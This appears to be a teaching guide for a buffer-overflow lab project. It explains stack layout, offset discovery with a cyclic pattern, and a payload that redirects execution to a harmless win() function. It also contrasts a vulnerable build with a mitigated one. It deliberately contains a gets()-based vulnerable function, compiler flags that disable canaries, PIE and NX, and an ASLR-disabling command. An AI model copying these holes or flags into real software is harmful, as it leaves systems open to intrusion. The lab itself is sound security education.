Project 5: Exploit Lab (Buffer Overflow Playground)

Build a controlled lab that demonstrates a stack buffer overflow and how mitigations (ASLR, NX, canaries) change the outcome.

Quick Reference

Attribute	Value
Difficulty	Advanced
Time Estimate	15-25 hours
Main Programming Language	C (Alternatives: C++)
Alternative Programming Languages	C++, Rust (for tooling)
Coolness Level	Very High
Business Potential	Medium (security training)
Prerequisites	Stack frames, C pointers, basic GDB
Key Topics	Stack layout, buffer overflow, mitigations, reproducible labs

1. Learning Objectives

By completing this project, you will:

Build a vulnerable binary and demonstrate a controlled crash.
Calculate overwrite offsets and confirm them in GDB.
Explain how ASLR, NX, and stack canaries mitigate attacks.
Create a deterministic lab mode with fixed addresses.
Practice safe, isolated exploitation workflows.

2. All Theory Needed (Per-Concept Breakdown)

2.1 Stack Frames and Calling Conventions

Fundamentals

A stack frame is the memory region used by a function call to store local variables, saved registers, and the return address. The return address is the instruction pointer where execution resumes after the function returns. In many calling conventions, local buffers are stored below the saved return address, which means that writing past the end of a buffer can overwrite the return address. Understanding stack layout is critical to exploitation because the exploit relies on predictable placement of the return address relative to a buffer.

Deep Dive into the Concept

On x86-64 System V, function arguments are passed in registers (RDI, RSI, RDX, RCX, R8, R9), and the stack pointer (RSP) must be aligned to 16 bytes at call boundaries. A typical function prologue saves the base pointer (RBP) and reserves stack space for locals by subtracting from RSP. The stack grows downward, so local variables are at lower addresses than the saved return address. This layout is visible in GDB using info frame and x/ memory commands.

Stack frames also contain saved registers and spill slots. The compiler decides whether to keep a variable in a register or on the stack. With optimizations disabled (-O0 -fno-omit-frame-pointer), the layout is stable and easy to analyze. This is crucial for a deterministic lab. If the compiler inlines functions or omits the frame pointer, the stack layout changes and becomes harder to predict. For the lab, you should compile with settings that keep frames explicit.

The return address is stored by the call instruction. When a function returns, the ret instruction pops the return address from the stack into RIP. If an attacker overwrites that address, they control execution flow. The buffer overflow exploit is a direct consequence of this mechanism: a write past the end of a local buffer can reach the saved return address. The offset from the start of the buffer to the return address is a key number you must compute and verify.

Stack alignment and red zones matter too. On some ABIs, there is a “red zone” below the stack pointer that leaf functions can use without adjusting RSP. This affects offsets and makes exploitation trickier. For a teaching lab, you should disable red zone usage if possible (e.g., -mno-red-zone on x86-64). This keeps the layout predictable.

Finally, stack frames interact with mitigations. Stack canaries place a random value between local buffers and the return address. If a buffer overflow corrupts the canary, the program aborts before using the corrupted return address. This is a software defense that depends on a stable stack layout. Understanding the frame layout is the foundation for understanding how canaries detect corruption.

How this fits on projects

Stack layout is used to compute offsets in Section 3.2 and observed in Section 3.7 and Section 5.5.

Definitions & key terms

Stack frame: Memory used for a function call.
Return address: Instruction pointer saved on the stack.
Prologue/Epilogue: Instructions that set up and tear down a frame.
Frame pointer: Register (RBP) pointing to current frame.

Mental model diagram (ASCII)

High addresses
+-------------------+
| Return Address    |
| Saved RBP         |
| Local buffer[16]  |  <- overflow can reach above
+-------------------+
Low addresses

How it works (step-by-step, with invariants and failure modes)

call pushes return address.
Prologue sets RBP and reserves locals.
Local buffer occupies space below saved RBP.
ret pops return address and jumps.

Invariant: Return address must remain unchanged for correct execution.

Failure modes: Buffer overflow corrupts return address or canary.

Minimal concrete example

void vuln(void) {
    char buf[16];
    gets(buf); // unsafe
}

Common misconceptions

“The stack is random.” -> It is structured, though ASLR randomizes base.
“All variables are on the stack.” -> Many live in registers.
“Return address is protected.” -> Not without mitigations.

Check-your-understanding questions

Why does -fno-omit-frame-pointer help debugging?
Where is the return address relative to a local buffer?
What does ret do?

Check-your-understanding answers

It keeps RBP-based frames for stable layout.
Above it, at higher addresses.
Pops return address into instruction pointer.

Real-world applications

Reverse engineering and debugging.
Exploit analysis and mitigation evaluation.

Where you’ll apply it

Section 3.2 Functional Requirements
Section 5.5 Questions to Guide Your Design
Also used in: Project 1: Memory Inspector Tool

References

“Practical Binary Analysis” (stack frames)
“Computer Systems: A Programmer’s Perspective” (procedure calls)

Key insights

Stack frames define exactly where control-flow data lives.

Summary

You can now reason about stack layout and predict overwrite offsets.

Homework/Exercises to practice the concept

Compile a function with -O0 -fno-omit-frame-pointer and inspect RBP/RSP in GDB.
Find the offset from a buffer to the return address.

Solutions to the homework/exercises

Use info registers and x/ in GDB.
Use a cyclic pattern and observe the crash address.

2.2 Buffer Overflow Mechanics and Payload Design

Fundamentals

A buffer overflow occurs when a program writes more data into a buffer than it can hold. In stack-based overflows, writing past the buffer can overwrite the return address, causing the program to jump to an attacker-controlled address. The simplest exploit is to overwrite the return address with a known value and cause a crash, proving control. This project focuses on understanding the mechanics rather than building real-world exploits.

Deep Dive into the Concept

The core idea is that memory is contiguous. A local buffer on the stack is placed adjacent to other data, including the saved return address. If the program uses an unsafe function like gets or strcpy without bounds checks, a long input will continue writing bytes beyond the buffer boundary. By carefully choosing the input, you can overwrite the return address with a value you control. When the function returns, the CPU jumps to that value.

Finding the exact offset is the key step. A common technique is to use a cyclic pattern (e.g., “AAAABBBBCCCC…”) so that when the program crashes, you can read the overwritten return address and map it back to the pattern position. Tools like pwntools automate this, but you can also build a simple pattern generator in C or Python. Once you know the offset, you can craft a payload: padding + new_return_address. In a lab, the new return address might be 0x41414141 (AAAA) to demonstrate control, or the address of a win() function inside the program that prints a success message.

Payload design depends on endianness. On little-endian systems, the byte order is reversed when writing multi-byte addresses. This is why you need to encode addresses carefully. For a deterministic lab, you can compile without PIE (-no-pie) so that function addresses are fixed. That allows you to build a payload that always jumps to the same address. This avoids the complexity of ASLR and makes the outcome predictable.

The exploit demonstration should remain safe. Instead of executing shellcode, use a benign win() function that prints “you win.” This keeps the lab educational and avoids introducing harmful techniques. The lesson is not how to compromise systems but how unsafe memory operations can redirect control flow.

The lab should also include a failure mode: if the payload is the wrong length, the program should crash with a different return address or fail to reach win(). This teaches that exploitation requires precision. You should also demonstrate how compiler warnings and modern safety flags (like -fstack-protector) prevent or detect these overflows.

Finally, connect this concept back to safe coding practices: the same overflow that allows control flow hijack also causes crashes and data corruption in real software. The lab’s purpose is to make these abstract dangers concrete so that you will avoid them in production code.

How this fits on projects

This concept drives the payload construction in Section 3.7 and the lab design in Section 5.10.

Definitions & key terms

Overflow: Write beyond buffer bounds.
Payload: Crafted input to overwrite control data.
Offset: Number of bytes to reach the return address.
PIE: Position Independent Executable (randomized code base).

Mental model diagram (ASCII)

[buf 16 bytes][saved RBP][return addr]
AAAA...AAAA BBBB CCCC -> overwrite return addr

How it works (step-by-step, with invariants and failure modes)

Provide oversized input to vulnerable function.
Input overwrites stack frame data.
Return address becomes attacker-controlled.
Function returns and jumps to new address.

Invariant: Without overflow, return address is unchanged.

Failure modes: Wrong offset, mitigations, ASLR.

Minimal concrete example

void win(void) { puts("WIN"); }
void vuln(void) {
    char buf[16];
    gets(buf);
}

Common misconceptions

“Any overflow gives control.” -> Only if it reaches control data.
“Offsets are constant across builds.” -> Compiler options change layout.
“Exploits always use shellcode.” -> Not necessary for learning.

Check-your-understanding questions

Why does PIE make exploit addresses unstable?
Why must payloads respect endianness?
Why is a win() function useful in a lab?

Check-your-understanding answers

PIE randomizes code base address.
Multi-byte values are stored least significant byte first.
It provides a safe, deterministic target.

Real-world applications

Security research and vulnerability triage.
Understanding crash reports caused by overflows.

Where you’ll apply it

Section 3.7 Real World Outcome
Section 5.8 Hints in Layers
Also used in: Project 2: Safe String Library as the prevention case.

References

“Hacking: The Art of Exploitation” (buffer overflows)
“Practical Binary Analysis” (exploit basics)

Key insights

Overflows become exploits when you control where the program returns.

Summary

You can now design and test simple overflow payloads in a controlled lab.

Homework/Exercises to practice the concept

Write a cyclic pattern generator and verify offsets.
Modify the buffer size and recompute the offset.

Solutions to the homework/exercises

Use a repeating sequence of three-character groups.
Re-run the crash and recompute the index.

2.3 Mitigations and Deterministic Lab Design

Fundamentals

Modern systems deploy mitigations like ASLR, NX (non-executable memory), and stack canaries to prevent buffer overflow exploits. For a teaching lab, you need to understand how to enable and disable these mitigations so you can observe their effects. You also need a deterministic mode where addresses and results are stable. This ensures your lab output matches documentation and tests.

Deep Dive into the Concept

ASLR randomizes the base addresses of the stack, heap, and libraries. This makes it hard to predict addresses across runs, which is why many exploits fail when ASLR is enabled. NX marks stack pages as non-executable, so even if you overwrite a return address to jump into injected shellcode on the stack, the CPU will refuse to execute it. Stack canaries place a random value before the return address; if a buffer overflow overwrites the canary, the program aborts before returning. These mitigations are designed to stop exactly the kind of exploit demonstrated in this lab.

For a deterministic educational lab, you want two build modes: “vulnerable” and “protected.” The vulnerable mode should disable canaries (-fno-stack-protector), disable PIE (-no-pie), and allow executable stacks if you plan to demonstrate NX (-z execstack). The protected mode should enable canaries and PIE (-fstack-protector-strong -D_FORTIFY_SOURCE=2 -pie -fPIE). This contrast demonstrates the effect of mitigations.

To make the lab reproducible, you should provide a script that runs with ASLR disabled in a controlled environment. On Linux, setarch -R can disable ASLR for a single process without changing global settings. This is safer than writing to /proc/sys/kernel/randomize_va_space. The lab should instruct users to run in a VM or container and to restore security settings after experiments. This is critical for ethical practice.

Deterministic output is also needed for tests and documentation. In vulnerable mode with ASLR disabled and PIE off, function addresses remain constant. This allows you to hardcode the win() address in your demo payload and show a stable transcript. For example, your demo can use a fixed payload file checked into the repo (payload.bin) and show that it always triggers the win() function. This yields a deterministic golden path for the project requirements.

Mitigations are also a conceptual lesson: most overflows are no longer trivially exploitable in modern environments, but they are still serious. A crash can be a denial of service, and complex exploits can still bypass mitigations. The lab should end with a clear statement: the goal is to understand why mitigations exist and how to write safer code, not to build real-world attacks.

How this fits on projects

Mitigations define the two build modes in Section 3.2 and drive the deterministic demo in Section 3.7.

Definitions & key terms

ASLR: Randomizes memory layout per run.
NX: Marks memory non-executable.
Stack canary: Guard value detecting overflows.
PIE: Position-independent executable.

Mental model diagram (ASCII)

Vulnerable build: fixed addresses, no canary
Protected build: random addresses, canary checks

How it works (step-by-step, with invariants and failure modes)

Build vulnerable binary with mitigations off.
Disable ASLR for deterministic run.
Run payload and reach win().
Build protected binary; same payload fails.

Invariant: Protected build should detect or prevent overflow.

Failure modes: Running with ASLR on yields non-deterministic results.

Minimal concrete example

# Vulnerable build
clang -O0 -fno-stack-protector -no-pie -z execstack vuln.c -o vuln
# Protected build
clang -O2 -fstack-protector-strong -D_FORTIFY_SOURCE=2 -pie -fPIE vuln.c -o vuln_protected

Common misconceptions

“Mitigations make code safe.” -> They reduce exploitability, not bugs.
“ASLR can be ignored.” -> It breaks naive exploit scripts.
“Turning off mitigations is harmless.” -> Only safe in isolated labs.

Check-your-understanding questions

Why does PIE make addresses unstable?
What does a stack canary detect?
Why use setarch -R instead of changing sysctl globally?

Check-your-understanding answers

PIE randomizes the binary’s base address.
Overwrites between locals and return address.
It limits scope to a single process.

Real-world applications

Security training labs.
Verifying compiler mitigation flags.

Where you’ll apply it

Section 3.7 Real World Outcome
Section 5.10 Implementation Phases
Also used in: Project 3: Memory Leak Detector

References

“Practical Binary Analysis” (mitigations)
“Hacking: The Art of Exploitation” (defenses)

Key insights

Mitigations shift overflow bugs from “trivial exploit” to “hard problem.”

Summary

You can now build a safe, deterministic exploit lab and compare mitigation effects.

Homework/Exercises to practice the concept

Compile the same program with and without PIE and compare addresses.
Enable stack canaries and observe the crash message.

Solutions to the homework/exercises

Use nm -n to compare symbol addresses.
The program should abort with a stack smashing message.

3. Project Specification

3.1 What You Will Build

A controlled lab with:

A vulnerable binary (vuln) containing a stack buffer overflow.
A protected binary (vuln_protected) built with mitigations.
A deterministic payload that triggers a safe win() function.
A README describing safe usage in a VM/container.

3.2 Functional Requirements

Vulnerable binary uses unsafe input (e.g., gets).
Protected binary uses compiler mitigations.
Demo payload reaches win() in vulnerable build.
Same payload fails in protected build.
GDB steps show overwritten return address.

3.3 Non-Functional Requirements

Safety: Must run in isolated environment; no real exploitation targets.
Determinism: Fixed addresses in vulnerable build.
Usability: Clear scripts and output.

3.4 Example Usage / Output

$ ./vuln < payload.bin
WIN: control flow hijacked safely!

3.5 Data Formats / Schemas / Protocols

Payload format:

[padding bytes][return address (little-endian)]

3.6 Edge Cases

Wrong payload length (crash without win).
Running with ASLR enabled (non-deterministic).
Protected binary aborts on canary detection.

3.7 Real World Outcome

The lab should show a successful overflow in vulnerable mode and a failure in protected mode.

3.7.1 How to Run (Copy/Paste)

make vuln vuln_protected
setarch $(uname -m) -R ./vuln < payload.bin
./vuln_protected < payload.bin

3.7.2 Golden Path Demo (Deterministic)

$ setarch $(uname -m) -R ./vuln < payload.bin
WIN: control flow hijacked safely!
Exit code: 0

3.7.3 If CLI: Exact Terminal Transcript

$ ./vuln_protected < payload.bin
*** stack smashing detected ***: terminated
Exit code: 134

4. Solution Architecture

4.1 High-Level Design

[vuln.c] -> [build variants] -> [payload] -> [demo output]

4.2 Key Components

Component	Responsibility	Key Decisions
Vulnerable program	unsafe input	`gets` for demonstration
Protected program	mitigations	PIE + canary
Payload generator	deterministic input	fixed offset + address
README	safety rules	VM / container usage

4.3 Data Structures (No Full Code)

char buf[16];
// stack layout implicitly defined by compiler

4.4 Algorithm Overview

Key Algorithm: Offset Discovery

Generate cyclic pattern.
Crash program and read overwritten RIP.
Compute offset.
Build payload with win() address.

Complexity Analysis:

Time: O(n) for pattern search.
Space: O(n).

5. Implementation Guide

5.1 Development Environment Setup

sudo apt-get install gdb clang

5.2 Project Structure

exploit_lab/
|-- vuln.c
|-- payload.py
|-- payload.bin
|-- Makefile
\-- README.md

5.3 The Core Question You’re Answering

“How does a single out-of-bounds write become control over execution?”

5.4 Concepts You Must Understand First

Stack frames and calling conventions (see Section 2.1).
Buffer overflow mechanics (see Section 2.2).
Mitigations and deterministic lab setup (see Section 2.3).

5.5 Questions to Guide Your Design

How will you keep the lab safe and isolated?
What compiler flags ensure deterministic addresses?
How will you show mitigations in action?

5.6 Thinking Exercise

If the buffer is 16 bytes and saved RIP is 24 bytes above it, how many bytes must your payload contain before the new return address?

5.7 The Interview Questions They’ll Ask

What is a stack buffer overflow?
How does ASLR make exploits harder?
What does a stack canary protect?

5.8 Hints in Layers

Hint 1: Start with a vulnerable function and confirm it crashes. Hint 2: Use GDB to inspect the stack. Hint 3: Use a cyclic pattern to find offset. Hint 4: Add a win() function and jump to it.

5.9 Books That Will Help

5.10 Implementation Phases

Phase 1: Vulnerable Program (3-4 hours)

Goals: create overflow and confirm crash. Checkpoint: program crashes with long input.

Phase 2: Offset + Payload (4-6 hours)

Goals: compute offset and reach win(). Checkpoint: deterministic win message.

Phase 3: Mitigations (4-6 hours)

Goals: build protected version and observe failure. Checkpoint: protected build aborts.

5.11 Key Implementation Decisions

6. Testing Strategy

6.1 Test Categories

6.2 Critical Test Cases

Vulnerable build with correct payload reaches win().
Protected build aborts with stack smashing.
Wrong payload does not reach win().

6.3 Test Data

payload.bin (fixed offset + win addr)

7. Common Pitfalls & Debugging

7.1 Frequent Mistakes

7.2 Debugging Strategies

Use info frame and x/32x $rsp in GDB.
Print the address of win() at runtime.

7.3 Performance Traps

Not relevant; focus is correctness and reproducibility.

8. Extensions & Challenges

8.1 Beginner Extensions

Add a script that prints stack layout.
Add a CLI option to show offsets.

8.2 Intermediate Extensions

Add canary detection demo with custom message.
Add a simple return-to-libc demo inside VM.

8.3 Advanced Extensions

Build a small ROP chain (in a VM only).
Add ASLR bypass discussion (theoretical).

9. Real-World Connections

9.1 Industry Applications

Security training and vulnerability analysis.
Crash triage and exploitability assessment.

pwntools (exploit development toolkit)
checksec (mitigation checker)

9.3 Interview Relevance

Explaining stack overflows and mitigations is common in security interviews.

10. Resources

10.1 Essential Reading

“Practical Binary Analysis” (exploit basics)
“Hacking: The Art of Exploitation” (mitigations)

10.2 Video Resources

University lectures on exploit mitigation.

10.3 Tools & Documentation

man 1 gdb, man 2 mprotect, man 1 setarch

11. Self-Assessment Checklist

11.1 Understanding

I can describe the stack frame layout.
I can compute overflow offsets.
I can explain how mitigations work.

11.2 Implementation

Vulnerable and protected builds work.
Deterministic demo output is achieved.
README includes safety guidance.

11.3 Growth

I can explain why safe coding prevents these bugs.

12. Submission / Completion Criteria

Minimum Viable Completion:

Vulnerable binary and crash demonstration.
Deterministic payload reaching win().

Full Completion:

Protected build demonstrating mitigations.
Clear instructions and safety notes.

Excellence (Going Above & Beyond):

Optional return-to-libc demo in isolated VM.
Additional mitigation experiments.